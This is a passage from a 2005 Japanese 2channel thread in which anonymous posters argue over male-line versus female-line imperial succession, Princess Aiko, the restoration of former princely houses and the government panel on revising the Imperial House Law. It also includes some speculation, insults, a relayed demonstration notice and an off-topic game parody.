単純に愛子様の子がどうなる程度の認識に矮小化される危険が有る。 と言うか、既にされてる。
キチンと天皇系統とは別の系統に成る、別の氏族に纂奪されると説明するよう求めないと。
愛子様の子が女系程度の矮小化された認識だと意味が無い。


62 :名無しさん@6周年:2005/11/18(金) 10:27:04 ID:jkJLsYnx0
>>51
>「男系の男子」から、「男系の男女」に変える手もある。

それじゃ次の子孫につながらないから現状の解決にはならない。
女帝の一代を延長できるだけで継承者が断絶する。

63 :名無しさん@6周年:2005/11/18(金) 10:30:13 ID:zX3ipxmu0
>>52
>明治の皇室典範は、こうした事例、歴史、先人の判断の重みを十分に踏
>まえた形で制定されたものであり、この典範の精神をよく吟味し、様々
>な伝統、事例の中から、何を守り、何を変え、いかに発展洗練されてき
>たのかを読み解くことが重要と考えます。

逆に明治と今は時代が違う、天皇も皇太子も側室も持っていないし、
持つことすら許されない世論の空気さえ有る、またGHQが宮家を
減らすなど想定の範囲外の範囲外、それに伴い皇統に全く男子が
産まれないなどこれも想定の範囲外の範囲外、そういう歴史の流れも
汲み入れながら改正していくのに何の不都合があろうか。
天皇の正当性や制度そのものに足を踏み入れてはならないが、
皇室典範は制度に沿う形で時代に即して変えるべきだと思う。

64 :名無しさん@6周年:2005/11/18(金) 10:30:31 ID:i9KLXXqa0
>>46-47
蛇足だが...
天智朝・光仁(桓武の父)は天武朝・称徳(孝謙)の妹と結婚していて、
その子供・他部(おさべ)親王は皇太子となった。
ここまでは順当だった...
しかし桓武を皇太子→天皇にしたい一派のために他部たちは排斥された。
天皇になった桓武は弟・早良(さわら)親王を皇太子に立てたが、
またまた平城を皇太子→天皇にしたい一派のために早良たちは排斥された。
たまたま偶然に桓武の近親・近臣が不慮の死を遂げたので怨霊とおそれられた...
王朝交代も大変だなw


65 :名無しさん@6周年:2005/11/18(金) 10:30:39 ID:Rdkub0nt0
>>46
何とか旧皇族復帰を阻止しようと、いろいろ勉強してくるねー。
感心するよ。

いくら頑張ってもだから女系(本当は皇統外)にしようと言った瞬間に
主張が破綻すんだけどね。

だったら明治天皇の子孫や昭和天皇の子孫の旧皇族の方でもいいじゃん、
って話になる。

66 :名無しさん@6周年:2005/11/18(金) 10:33:11 ID:zX3ipxmu0
>>62
何で? 例えば愛子(男系女子)が一度継いで、そのあと旧宮家を復活させて
愛子のあとをその男系男子が継ぐという事も考えられるだろ。
男系の男女を認めることは継承者の断絶を何ら意味しない。

それよりも、国民が無知すぎることが全ての元凶、まずこれを正さないと、
天皇の制度を理解せず、単なるお家の跡継ぎにしか考えてない奴多すぎ。

67 :名無しさん@6周年:2005/11/18(金) 10:33:31 ID:Rdkub0nt0
>>63
ということでまずは旧皇族復帰させましょう。

68 :名無しさん@6周年:2005/11/18(金) 10:36:43 ID:aUvo8qxD0
女系女系と言うが愛子様のお子様は小和田女系であって
神武女系では決してない、無論神武男系でもない
「有識者」は、情報を隠さずに王朝の交代だってはっきり言えよ

69 :名無しさん@6周年:2005/11/18(金) 10:40:25 ID:GHSwdQrc0
側室がいても男子が産まれるとは限らないよな。
徳川家も側室がいても男子が生まれなくて、
15代のうち何度も紀州家とか分家が継承しているし。
だから、仮に側室を置いても根本的解決にはならない。

男系女子も1代限りだし、やはり皇族の数自体を増やさないと、
どうにもならないな。


70 :名無しさん@6周年:2005/11/18(金) 10:40:52 ID:i9KLXXqa0
>>68
アイコが小和田系であって、
アイコの子供は男女関係なくアイコのダンナ系だぞw


71 :名無しさん@6周年:2005/11/18(金) 10:41:35 ID:YpkyiGN60
高橋紘って皇室ジャーナリストといってるが
要するに共同通信で皇室問題を任せられてただけだろ。
共産党の誰でもいいから連れてくれば高橋と同じこというぜ。
勉強会やるのはいいが、いずれにしても有識者会議の進め方が拙速
という点はどんな立場の人間でも認めざるを得ないだろ。
多くの国会議員に問題が周知されていない時点で
この問題の結論をいま出せないことは証明されたわけだからな。
あと愛子様の夫が見つからないから無理だという意見があるが、
それはいとも簡単に見つかるよ。別に天皇になるわけじゃないからね。
むしろそれを狙った皇統外容認だろうよ。

72 :名無しさん@6周年:2005/11/18(金) 10:42:29 ID:jkJLsYnx0
>>60
>じゃあ黒田家も宮家にとか言われそうだな。

皇室典範がすでに女子・女系容認で改正されていたら当然
紀宮様は皇族のまま紀宮家(黒田家ではない)として継続される。
黒田様は天皇にはなれないが皇婿になる。その子孫は皇位継承者となる。
だからこんなことを許容すればすぐに日本中が皇族だらけになる。

73 :名無しさん@6周年:2005/11/18(金) 10:42:40 ID:MwaNhuLu0
三笠宮のところに、もうすぐ結婚適齢期になる娘が二人いるけど、
今度旧皇族と婚約することになりましたと発表してしまえば、
旧皇族復活が現実味を帯びてくる。

同じく三笠宮系の高円宮家にも少し若いが娘が3人いるし。

74 :名無しさん@6周年:2005/11/18(金) 10:43:11 ID:zTGd4aKF0
どうでも良いが、これか一種の革命だな。
今の情報の発達した民主主義の時代に皇室制度の存続は土台無理な話だよ。
本来なら第二次世界大戦、いや明治維新ぐらいで
皇室制度は終焉を迎えていたのかもしれないのにね。

古代の出雲国造家のように、神社仏閣の最高権威として
生き残っていくしか道は残されていないと思われ。

考えてみれば、明治維新なんて勤皇でも何でもないと思われ。
皇室の最高の藩屏は堂上家(公家衆)だったのが
明治維新で、諸侯、維新功労者、豪商まで皇室の藩屏たる華族と認定され、
朝廷体制が崩され、第二次世界大戦の敗戦で
それらも全部崩されていき、あの狭い皇居の中に皇室だけが残された。

もう限界だろうと思う。

75 :名無しさん@6周年:2005/11/18(金) 10:43:45 ID:PTchjzNf0
死にたい人にお薦めの危険な街 麗しのアバロン

・軍人上がりの8人なら大丈夫だろうと思っていたら同じような体格の1人にパリィされた
・リャンシャンから徒歩1分の路上でソウジが頭から血を流して倒れていた
・足元がほぎーとしたので墓石をめくってみるとアリの巣があった
・指輪をした皇帝と宿に泊まり、目が覚めたらLPが減っていた
・ダッシュでルドン高原に突っ込んで倒れた、というか死んだ後から皇位とかを継承する
・巣が皇帝に襲撃され、兵アリも「女王も」全員駆除された
・テレルテバから移動湖までの10mの間にナイトフォークに襲われた
・地上戦艦に乗れば安全だろうと思ったら、戦艦の乗員が全員誘い出された。
・魔物の1/3が被虐殺経験者。しかもレアアイテムを落とすという都市伝説から「強いほど危ない」
・「そんな危険なわけがない」といって出て行ったダンターグがデストロイヤーを落とすまで5時間ほど殺され続けた
・「何も持たなければ襲われるわけがない」と手ぶらで出て行ったアルビオンが技道場の師範にされ戻ってこなかった
・最近流行っている技は「千手観音」 分身して魔物に殴りかかるから
・皇帝から半径200mは戦闘になる確率が150%。一度退却されてまた戦闘になる確率が50%の意味
・アバロンにおける殺人事件による死亡者は1日平均120人、うち約20人が皇帝。
鬼畜プレイは程々にな



76 :名無しさん@6周年:2005/11/18(金) 10:45:28 ID:zGyFH9kK0
日本会議内でも意見が割れるようならダメだなこりゃ。

77 :名無しさん@6周年:2005/11/18(金) 10:45:33 ID:Rdkub0nt0
>>71
> 有識者会議の進め方が拙速
> という点はどんな立場の人間でも認めざるを得ないだろ。

まずは皇族の意見を聞け、ということで攻めるのがいいと思う。
憲法違反ではない。

> あと愛子様の夫が見つからないから無理だという意見があるが、
> それはいとも簡単に見つかるよ。

夫になろうという人はよっぽどの馬鹿か、何らかの意図がある
人だけ。
見識があればある人ほど夫になれるわけがない。

78 :名無しさん@6周年:2005/11/18(金) 10:47:10 ID:aUvo8qxD0
>>70
女系を辿ると小和田女系ってこと、男系を辿るなら旦那の男系だけど

79 :名無しさん@6周年:2005/11/18(金) 10:48:00 ID:zX3ipxmu0
>>69
だから明治に皇室典範出来た時点では、側室容認+宮家、だったんだよな、
今は側室無し+GHQ政策で宮家減少、と言う非常事態。

それにしても、ここまで現宮家に女子ばかり誕生するとは確率的にも異常だけど…。

旧宮家の復活というのがやはり制度に則していて、かつ現実的な選択肢だよな、
皇太子も秋篠宮も側室はとらんだろうし、また取ったとしても大半の国民は
歓迎しないだろう、時代だから仕方ない。

80 :名無しさん@6周年:2005/11/18(金) 10:51:54 ID:zTGd4aKF0
小泉は事の重大さを認識していないというのは嘘だと思うな。
小泉は女系を認めるのではなく、
立憲君主制を終わらせ、大統領制のようにすることが最大の目的だと思う。
日本がここ数十年、いや百数十年、迷走してきたのは
国に責任ある代表者が居なかったからと考えてるんだろう?
調整型の指導者しかいないから、国全体がバラバラで一つの戦略が
立てられなかったと思っているんだろう?
それには現在の象徴天皇制・議院内閣制は邪魔と思っている。
現在でも小選挙区制が上手く機能して、小泉は大統領的首相になったが、
そうなった途端、中国・韓国に対して強烈な態度に出ていっている。

おそらく、皇室は神社仏閣関係の最高権威として
日本一、由緒ある宗教法人にでもして存続させるんだろう?
まあ、今の象徴天皇制よりは、そのほうが伝統を守れそうだけどね。

81 :名無しさん@6周年:2005/11/18(金) 10:56:15 ID:g3lzho5R0
皇室系のスレが立つとすぐに女系・男系の根本論議にばっかりなってるね。
それより元記事の趣旨にたって
国会議員の中で誰が女系反対に動いてくれそうか
洗い出していくほうが女系反対派にとっては建設的だと思う。

稲田○ 大前× みたいにね。
リストアップして電凸と。

82 :名無しさん@6周年:2005/11/18(金) 11:01:20 ID:YpkyiGN60
>>77
>夫になろうという人はよっぽどの馬鹿か、何らかの意図がある
人だけ。

その意図がこの一件のねらいと考えるのは自然だ。
もう婿を出す企業の候補ぐらいしぼられてる可能性もある。
外資も当然入ってるだろうよ。

83 :名無しさん@6周年:2005/11/18(金) 11:04:15 ID:jkJLsYnx0
自民党議員が旧宮家復帰に反対する理由は何だろう?
ただ単に歴史の知識不足だけなのかな?
世襲議員が多いのだから世襲がどういうことかくらいは
解ってると思ってたのだが・・・。

84 :名無しさん@6周年:2005/11/18(金) 11:17:09 ID:GHSwdQrc0
>>80
小泉が紀宮の結婚式に出ないで、
金閣寺でブッシュと会っていたってのも、象徴的だな。
平成の足利義満よろしく、皇位簒奪の密談をしていたのかね。
ブッシュから日本国王に封ずとか金印もらってたりしてw


85 :名無しさん@6周年:2005/11/18(金) 11:21:24 ID:Rdkub0nt0
>>83
自民党議員がどうという話はまだなくて、有識者会議が
反対しているだけ、というのが現状。

有識者会議は官邸の私的諮問機関なので、小泉も反対
していると見れると思う。(小泉が否定しようともね)


ちなみに有識者会議について誤解している人もいると思うが、
この手の会議は会議にもよるだろうが、会議前から発言
も含めて議事内容が決まっていることもある。

つまり会議をしたというただの形式作り。

実際この手の会議に出ている知り合いから聞いた話。

86 :名無しさん@6周年:2005/11/18(金) 11:23:27 ID:YpkyiGN60
>>80
その線はあると思うが、
もしそうなら小泉は近視眼だろ。
たまたま小泉は大統領的首相になったが、以後の政権はわからん。
天皇は憲法で象徴に祭り上げておかないと常に政争の具になる。
つまり日本では天皇がいるかぎり大統領制は無理なのだ。
もし本気で共和制にするなら天皇を滅ぼすしかない。
そこまで腹くくれないら小泉のやり方は禍根を残すよ。

87 :名無しさん@6周年:2005/11/18(金) 11:27:49 ID:EuS1lUgT0
弟の嫁が男生めばほぼ解決だろ。

88 :名無しさん@6周年:2005/11/18(金) 11:28:38 ID:GHSwdQrc0
ちなみに、京都(金閣寺)での日米会談は、
ブッシュ側のほうが熱烈に希望して実現したそうだ。


89 :名無しさん@6周年:2005/11/18(金) 11:30:50 ID:VEWZ/ppS0
女系天皇容認論は男女平等の世の中だからいいんじゃない?って程度の認識だからな

90 :名無しさん@6周年:2005/11/18(金) 11:32:12 ID:GMeGVdTY0
「女性」はいい。「愛子様」でいいじゃん。でも「女系」は駄目、男系で
という人に言っておく。

いい加減腹くくれ、覚悟を決めろ。
皇太子→秋篠宮→旧宮家男子

これしか選択の道はないんだよ。
傍系でも男系男子が存在する以上男子が継承する。
それが万世一系の精神そのもの。
それとも何か、そんなに旧宮家男子が嫌だからって、
まさか○したりしないだろうなw



91 :名無しさん@6周年:2005/11/18(金) 11:32:18 ID:oqBRO6r80
>>80
小選挙区に反対していた小泉がそこまで考えているんだろうか?


92 :名無しさん@6周年:2005/11/18(金) 11:33:51 ID:zX3ipxmu0
>>90
言ってることが無茶苦茶なんだが

93 :名無しさん@6周年:2005/11/18(金) 11:41:50 ID:jtni6RB0O
つーか、日本会議って時点で(ry

94 :名無しさん@6周年:2005/11/18(金) 11:45:33 ID:jmIOn1OS0
>>83
そもそも皇統は「世襲」じゃないんだよね。正確には。

世襲なら今頃なくなってるだろうよ。

95 :名無しさん@6周年:2005/11/18(金) 11:49:12 ID:J3pOhzmC0
ふん、国会議員すら知る機会がない日本の皇室制度。
こんな体たらくなら、いまの若年層がジジイになる頃には廃止だな。

どーにかして、天皇教育を幼少期からやりやがれ!!!

96 :名無しさん@6周年:2005/11/18(金) 11:54:30 ID:mG6nYBla0
男系を主張する人はさぁ、過去こうだったからって言い過ぎじゃない?
逆にそれで説得力が失われてる気がする。
過去がどうでも長子が天皇になれないのはかわいそうだし〜、
男女差別だし〜、っていう人が大半。
伝統にこだわる人は決して多くないんだから、女系にすると将来こういう問題が起きますよ
って感じで将来起こりうる問題を提起するべきじゃないの?

ちなみに俺は、男系の血筋を受け継ぐ旧皇族が将来天皇を自称する可能性が十分考えられ
るから女系反対。
万世一系という点からは圧倒的な正当性を持つ熊沢天皇がぽこぽこ現れたら…
しかもそいつらが自称有栖川の馬鹿二人組ほどのアホだったら…
当然変な連中がこの自称天皇を担ぐよね…

恐すぎです。

97 :名無しさん@6周年:2005/11/18(金) 11:58:42 ID:A6nvAysK0
官邸とアベちゃん、
マスコミ数社に女系反対のメール送った

あと各議員のサイト探して送りまくるかな

98 :名無しさん@6周年:2005/11/18(金) 12:00:03 ID:Wb+9VPlgO
>>90
一理ある。女帝賛成は「歴史的には絶対ダメじゃないから、必ずしも認めないと
いうことではない」という程度だと思う。しかし歴史的に女帝は緊急事態におけ
る「中継ぎ」として置かれていた。今の女帝賛成はそのまま女系賛成につながる
恐れがある。例えば秋篠宮はじめ皇位継承権を有する皇族が皇太子一人しかいな
い状態ならば、中継ぎとして愛子女帝もありだが、今はその状態にない。むしろ
旧皇族を復帰させ、女性皇族と婚姻関係を結ぶべるかどうかを見極めてから女帝
を決めるべきだ。今女帝が生まれる状態にないのこれを認めれば、すなわち女系
容認に移行する。


だから順番としては女帝をまず認め、その後から旧皇族を認めるのではなく、ま
ず旧皇族を復帰させ、その後に婚姻関係を見守るまでは女帝を口にださないほう
がいい。

99 :名無しさん@6周年:2005/11/18(金) 12:02:35 ID:oqBRO6r80
女系に反対するのは賛成派の魂胆が見え透いているからだろ。
ただそれを訴えると所謂「陰謀説」になっちゃうから控えているんだと思うが。




100 :名無しさん@6周年:2005/11/18(金) 12:02:49 ID:8HkzUx0d0
>>96
>過去がどうでも長子が天皇になれないのはかわいそうだし〜、
>男女差別だし〜、っていう人が大半。

なにそれ?次男次女差別ならOKってこと?

101 :名無しさん@6周年:2005/11/18(金) 12:05:12 ID:PTchjzNf0
わかったわかった
つまり女帝反対派のいいたいことは
「藤原氏」「平家」
ってことだろ?
確かにそりゃ危ないな
でもその危険性を排除したらOK?

102 :名無しさん@6周年:2005/11/18(金) 12:07:40 ID:8HkzUx0d0
>>101
誰も女帝反対などとは言ってないんじゃないか?
女系に反対してるのだよ

103 :名無しさん@6周年:2005/11/18(金) 12:08:02 ID:zTGd4aKF0
>>91
小泉は10年前、小選挙区制は独裁者が誕生するからって反対していた。
あの当時は、自衛隊のイラク派遣ですら反対していた。

それが首相になった頃から、全て方向転換してきた。
自衛隊のイラク派遣もするし、首相公選制にも賛成するし、
小選挙区制の特色を存分にいかして大統領的な首相になってきた。

104 :名無しさん@6周年:2005/11/18(金) 12:11:48 ID:J/mWnZqtO
普通は自分の国の皇室の歴史とか制度って、学校で習うべきなんじゃないの?
他の国はどうなんだろう

105 :名無しさん@6周年:2005/11/18(金) 12:14:12 ID:2w7vDfUU0
いいこと思いついた! 今の天皇・皇后陛下に再度子供を作っていただく。
何人か男の子を産むだろうよ。

106 :名無しさん@6周年:2005/11/18(金) 12:15:56 ID:XHTGsRnY0
>>104
教えられない恥べき歴史が日本にはあるんじゃないの?
有識者っていう物言いが滑稽だよね。有識っていうか、詐欺師?みたいな。

107 :名無しさん@6周年:2005/11/18(金) 12:18:58 ID:Wb+9VPlgO
女帝を認めるということは今の制度なら「愛子様は生涯独身」ということになっ
てしまう。まだ五歳に満たない人の将来を決めるのはよくない。当然愛子様も結
婚できるというようになるだろう。それは即ち女系の誕生である。

仮に愛子様が旧皇族と結婚して「皇后陛下」になり、天皇の死後寡后として、皇
位を継承することならありうるかもしれない。しかし、そこまでして女帝にした
いという人はいないだろう。今の女帝容認は女系容認につながることは認識した方がいい。



108 :名無しさん@6周年:2005/11/18(金) 12:24:04 ID:8HkzUx0d0
>>106
恥ずべき歴史などない
近代史や国体を教えないのは教師に
売国教育をしたがってる奴が何人もいる現状が危ないのでやらせられないのだ

109 :名無しさん@6周年:2005/11/18(金) 12:25:02 ID:XHTGsRnY0
>>107
有識者って人達は物理的に無駄な抵抗が多いんじゃないの?
現代において、みっともない恥を世界に晒し続けるのはどうかね? 

110 :名無しさん@6周年:2005/11/18(金) 12:27:29 ID:ebEhbajqO
>>106
>教えられない恥べき歴史が日本にはあるんじゃないの?

特定アジアかよ…

111 :名無しさん@6周年:2005/11/18(金) 12:27:36 ID:XHTGsRnY0
>>108
でも、ファンタジーをいつまでも教え続けるのが愛国なの?
教科書はファンタジーが5割は占めると思うけど。
それが愛国なの?

112 :名無しさん@6周年:2005/11/18(金) 12:32:35 ID:8HkzUx0d0
>>111
何の教科書の何処がファンタジーなのだ?
日本史で近代史をすっ飛ばしてるだけだぞ

113 :名無しさん@6周年:2005/11/18(金) 12:33:11 ID:FPW9vQOz0
>>111
まったくファンタジーが入っていないとは言えなけど
5割ってなにを根拠に。
簡単な例を一つでも教えてください。


114 :名無しさん@6周年:2005/11/18(金) 12:33:32 ID:crdAIxoL0
たぶん崇徳院の祟りだよ。
「われ日本国の大魔王となり、皇を取って 民となし、民を皇となさん」

115 :名無しさん@6周年:2005/11/18(金) 12:34:09 ID:Vj3PrcV/O
特定2ちゃんねらー大暴れ

116 :名無しさん@6周年:2005/11/18(金) 12:36:08 ID:1aZ0qB5U0
まるでこれから子供が生まれないことを前提にしてるのってどうなの?

117 :名無しさん@6周年:2005/11/18(金) 12:36:26 ID:ebEhbajqO
>>111
ファンタジーって何?
天皇の歴史も歴史に違いはありませんが

118 :名無しさん@6周年:2005/11/18(金) 12:41:37 ID:Du+qDwc80
天皇廃止で、OKやろ。

119 :名無しさん@6周年:2005/11/18(金) 12:44:20 ID:TlnsPYdB0
こればかりは
おいらが助太刀というわけにもいかないしなあ。

120 :名無しさん@6周年:2005/11/18(金) 12:45:36 ID:crdAIxoL0
>>118
どうせやったらオマエの人生廃止にしようや。

121 :名無しさん@6周年:2005/11/18(金) 12:46:21 ID:FPW9vQOz0
女系認めたとして
皇族の範囲はどうなるのだろう?
有識者会議ではどういった提言をするの


122 :名無しさん@6周年:2005/11/18(金) 12:47:00 ID:zGyFH9kK0
象徴天皇制の廃止を検討して欲しいね。
天皇家は、日本人の中で最も虐げられてる存在じゃないか。
本来逆だろ?

123 :名無しさん@6周年:2005/11/18(金) 12:54:23 ID:Rdkub0nt0
>>118
>>122
こういう分かりやすい意見はいいよな。

国民の多数意見は天皇制維持だ、で終わるから。

しかし天皇制廃止のために女性・女系を容認するという凝った
ことしてくるやつらがいるから、話がややこしい。

>>121
女性でも宮家が作れるようにするとかいっている。
しかし詳しい範囲は分からん。いきなり発表すんでしょうね。

124 :名無しさん@6周年:2005/11/18(金) 12:57:08 ID:4TIcGaFU0
>>121
有識者の女系論でいけば、天皇の第1子がいつでも
次の天皇らしいから、天皇家以外の宮家(いわば
スペア)は不要となりそうな悪寒。ガクブル。

男系支持者ガンガレ!

125 :名無しさん@6周年:2005/11/18(金) 13:04:33 ID:XHTGsRnY0
だから、有識者ってその傲慢な人達って何様?
一種、詐欺師であり、一種、皇室博士?
有識者って言葉の使い方間違ってない?

126 :名無しさん@6周年:2005/11/18(金) 13:04:40 ID:u9zcreG50
女天皇って昔もいたんだから別にかまわんだろ

127 :名無しさん@6周年:2005/11/18(金) 13:05:36 ID:ebEhbajqO
>>126
女系天皇はいない

128 :名無しさん@6周年:2005/11/18(金) 13:05:40 ID:VCh2p0+x0
>>124
第一子優先なら逆にほとんどの皇族を残さなくてはいけなくなるんだよな。
病気など色々あるから。勿論即位したあともね。
というか離脱出来る奴がほとんどいなくなる。

男系復帰反対派が言う税金云々ならこちらの方が税金は絶望的に膨らむがね。

129 :名無しさん@6周年:2005/11/18(金) 13:06:02 ID:FPW9vQOz0
>>123
書き込んでから少しググったけど、
第一子を男女かかわらず皇位継承者とする。女系も認める。旧皇族の復帰は無い。
くらいのことしかわからないね。

今と同じ親等まで皇族なら、女子も皇位継承権者になることから単純に二倍の割合で
宮家が増えていくことになるし、その上断絶の割合が二分の一になって宮家増加
皇室費大幅増だね。

>>124
もし、そうなら天皇なり皇太子に子供できなければ即断絶だね。
ならば、天皇家の今後のありかたを検討する有識者会議って
いかに皇室を断絶させるか話し合う場だったのかよw


130 :名無しさん@6周年:2005/11/18(金) 13:07:05 ID:8hXwecat0
女系天皇容認は天皇制崩壊の第一歩になってしまう。



だから賛成。

131 :名無しさん@6周年:2005/11/18(金) 13:13:54 ID:jkJLsYnx0
>>121
>皇族の範囲はどうなるのだろう?
>有識者会議ではどういった提言をするの

最終結論はわからないが今の宮家は永世皇族として
残すようなバカなことを有識者会議は言ってる。
皇族をどうして肥大しないように残すか先人の苦労
に学ぼうともしない奢った有識者ばっかりだ。
トヨタの奥田氏のみ金がかかりすぎるといって心配している。

132 :名無しさん@6周年:2005/11/18(金) 13:18:09 ID:jkJLsYnx0
>>124
>有識者の女系論でいけば、天皇の第1子がいつでも
>次の天皇らしいから、

そうだよ。だけど天皇の長子がいないときは他の宮家
に継承することになってるから宮家が多すぎてこまる
ことはあっても継承者断絶はありえない。
天皇制は千代に八千代に廃止できない。

133 :名無しさん@6周年:2005/11/18(金) 13:20:43 ID:mLSX3vhL0
雅子様が最初に流産、次が女児(愛子様)誕生のときは、CIAの陰謀を妄想したなあ

134 :名無しさん@6周年:2005/11/18(金) 13:26:22 ID:5Gtn8neX0
>>19

男系男子と愛子様が結婚しても駄目だろ、それ。

その結婚相手が天皇にならない限り、男系継承には
ならんのじゃないか






135 :地球市民:2005/11/18(金) 13:28:55 ID:A31/svaB0
日本会議かw

136 :名無しさん@6周年:2005/11/18(金) 13:29:47 ID:7X9csqtl0
キコ様はマサコに遠慮しなくてよかったのに

137 :名無しさん@6周年:2005/11/18(金) 13:30:38 ID:zX3ipxmu0
>>134
なるよ? 男系男子ってのは、天皇の父の父の父の…って
たどっていくと天皇に突き当たる系譜のこと、つまり愛子天皇に
男系男子の夫との子どもが生まれれば、その子は男系男子
ということになり、即位すれば立派な天皇陛下で男系継承となる。

男系継承は別に父親が天皇陛下である必要はないんだよ、
父の父の…とたどっていった場合に天皇陛下がいればいいの。

138 :名無しさん@6周年:2005/11/18(金) 13:32:10 ID:61zwWcFb0
議員ですら理解してないんだったら、大半の国民が問題点を分かるわけねーよ
(● ●)フンガーの同情作戦に騙されて票を投じるようなババアみたいのがマスゴミのミスリードに気付くわけがない

139 :名無しさん@6周年:2005/11/18(金) 13:33:10 ID:ebEhbajqO
男系に賛成だけど女帝が独身でなければならないっていう伝統に執着する気は起こらんなぁ

140 :名無しさん@6周年:2005/11/18(金) 13:33:12 ID:ftJrgeNU0
歴史的には、ってねえ…どんな歴史だって転換点ってもんがあるんだから

141 :名無しさん@6周年:2005/11/18(金) 13:33:53 ID:zTGd4aKF0
紀宮と黒田さんは伊勢神宮へ新婚旅行だそうな。
もう、皇室は宗教法人として
伊勢神宮などの長として運営していったら良いのでは?
雅子妃殿下が、皇室の申し合わせを無視して
洋服で紀宮の結婚式に出席したのにはビックリした。


142 :名無しさん@6周年:2005/11/18(金) 13:34:59 ID:jkJLsYnx0
>>140

継続は力なり、ということもある。
転換しなくてもいい状況で転換する必要はない。

143 :名無しさん@6周年:2005/11/18(金) 13:37:51 ID:zTGd4aKF0
>>138
そう。つまり、皇室の伝統などを守っていこうと思えば
象徴天皇制なんて制度は限界があるんだわな。
小泉が、自民の憲法案の作成で
他の議員の「伝統や文化を愛する」という案の部分を削除させて
これまで通り「象徴天皇制」だけに拘ったのには
香具師の思惑が隠れている。

小泉は、陛下の口から「皇室制度の廃止」を引き出そうとしている。

144 :名無しさん@6周年:2005/11/18(金) 13:40:51 ID:ftJrgeNU0
それに旧宮家が復活するにしても決定的に血の近いのがいるわけでなし、
どうせ協議で決めるんなら正統性をめぐって『南北朝』状態になるだろうし
八木氏の話は説得力があるって馬鹿じゃねえすか。

145 :名無しさん@6周年:2005/11/18(金) 13:43:59 ID:FPW9vQOz0
>>140
確かに、どんな物の歴史にも転換点は存在する。
しかし、少なくとも1400年はそうしてきたものを、わずか1年程の話し合いで
変えてよいものか。そんれも少数の有識者と称する、素人による話し合いによって



146 :名無しさん@6周年:2005/11/18(金) 13:48:25 ID:aUvo8qxD0
>>144
わかりやすいから
で今までの伝統を否定するより説得力はある

147 :地球市民:2005/11/18(金) 13:49:28 ID:A31/svaB0
今回の皇室典範改正で確実に決まりそうなのは愛子女帝なんだから
男系派は数十年後にあるであろう次なる改正の時のときのために
力を蓄えて地道に啓蒙していくほうがいいと思いますよ。

今回は勝負有り。

148 :名無しさん@6周年:2005/11/18(金) 13:49:30 ID:D3nQ20/90
以下、文化放送チャンネル桜の一視聴者による、書き込みです。

<「『皇室典範改悪阻止』草莽崛起の会」よりお知らせ>
国民集会の前に、デモ行進を行ないます。参加をご希望される方は、
17時30分までに「囲町公園」に集合して下さい。
【囲町公園】中野区中野4丁目(中野駅北口より徒歩4分)
17時30分 囲町公園集合
17時50分 囲町公園出発
18時30分 「なかのZERO」着予定


149 :名無しさん@6周年:2005/11/18(金) 13:50:02 ID:+7jZ0x76O
>>71
高橋は天皇皇后両陛下に嫌われと皇居に立入禁止との噂が有る。
>>74
例えば、ローマ法王の権威は国家に対する逸れでは無く、
教会に対する影響力から来る権威です。 
教会を神社、仏閣、神道系や仏教系の一部や露会や様々な団体に置き換えば、必ずしもそうとは限らない。
ようはやる気次第ですね。


150 :名無しさん@6周年:2005/11/18(金) 13:52:23 ID:7v3elyL50
男系継承だからこれまで断絶せずに続いていた。
ただし、それを保証する装置としての側室制度と
多数の宮家が復活しなければ無理がある。

151 :名無しさん@6周年:2005/11/18(金) 13:52:48 ID:D3nQ20/90
以下、文化放送チャンネル桜の一視聴者による、書き込みです。

<「『皇室典範改悪阻止』草莽崛起の会」よりお知らせ>
二千年以上続いた日本の国体・国柄が、今、一部の人々の手によって
改悪されようとしています。日本が日本で無くなる危機が迫っています。
先帝陛下が『耐え難きを耐え、忍び難きを忍び』守られた日本の国体、
これを私たちの世代で壊してはなりません。
GHQ司令官マッカーサーですら変えられなかった、世界最古の国 日本
のあり方、その中心たる御皇室と皇統を、私たち日本国民の手で守り
抜きましょう!


152 :名無しさん@6周年:2005/11/18(金) 13:54:50 ID:ftJrgeNU0
八木氏の論は詭弁で、わかりやすいからの方がよっぽど説得力があるといいたい。

結局 伝統VS親しみやすさ の感情論に過ぎんのだから、
余計な理屈こねずに国民投票にでもかけろってもんだ。

153 :名無しさん@6周年:2005/11/18(金) 13:54:52 ID:jkJLsYnx0
>>139
>女帝が独身でなければならないっていう伝統

そんな伝統もないんだけど。最初の女帝である
推古天皇は結婚していた。竹田皇子という子供もあった。

154 :名無しさん@6周年:2005/11/18(金) 13:59:51 ID:XgfPhs7+0
こんなことじゃ血が消えて皇族って地位だけが虚しく残ることになるな・・・
こんなモノもう象徴でも何でもねえよ

155 :名無しさん@6周年:2005/11/18(金) 14:00:26 ID:+7jZ0x76O
>>96
その作戦も賛成なんですけど、誤解が有るといけないので一応返信するね。
>過去がどうでも長子が天皇になれないのはかわいそうだし〜、

古代から世界的に在る氏族ルールでは別系統は長子では無い。
また、苦しませてるのは、女系強要派だけどね。
旧宮家復活なら楽に成るのに、将来に渡り悩み苦しませようとしてる。
また、女系強要派は産め論だからね。
産む産まない関係無く、予備から安定する傍系こそ本質なのに。
氏族に別系統を強要するしね。
何より傍系を認めれば、個人、一人一人に対する負担が違う。
傍系の復活を認めず、女系を強要されるから男子を産まないととプレッシャーに成ってる。
傍系を認めれれば、個人に対する責任感が変わる。
何より、愛子様が悩み苦しませようとしてる。
女系強要派の方が問題は多い。
437:名無しさん@6周年 2005/11/13 11:45:41 CUMWobd5O [sage]
>>417
いいえ違います。
特定個人は産まなくても良いです。
何より、女系を強要されるから産まなくてはと成ってる。
将来に渡り皇統を守れなかったと責任感から苦しみ、
愛子様は女系強要派から守ろうと、結婚や子供で悩み苦しむ。自由と言っても、だから悩み苦しむ。
男系は氏族のルールどうりで良いです。個人に対する責任では無いです。


156 :名無しさん@6周年:2005/11/18(金) 14:01:03 ID:khKC8LmnO
>>144
明治天皇の孫がいるじゃん

157 :名無しさん@6周年:2005/11/18(金) 14:04:02 ID:7wmfMU7v0
何で愛子さまを「女帝」にというのか分らんね。
仮に典範改正(ホントは改悪)したって、経過措置としてまず現行法優先じゃないの。
そうだとすると皇太子→秋篠宮の後の話だ。
「愛子女帝」派はまず男系男子の秋篠宮をふっ飛ばす理由から説明してくれ。



158 :名無しさん@6周年:2005/11/18(金) 14:04:34 ID:+7jZ0x76O
>>155の続き。
>男女差別だし〜、っていう人が大半。

系統に男女も無いから男女平等とか関係無いんだよね。
男系だから天皇では無く、天皇の系統が男系を正統とする系統なだけです。
女系は女系で正統と成る系統も有りますので。女系を一つの別の系統と考えない方が差別です。
また、今上陛下も皇太子様も女系男子として女系にも属してる訳です。
そもそも、女系男系継承とか女系相続とかの議論が誤解を招いてる。
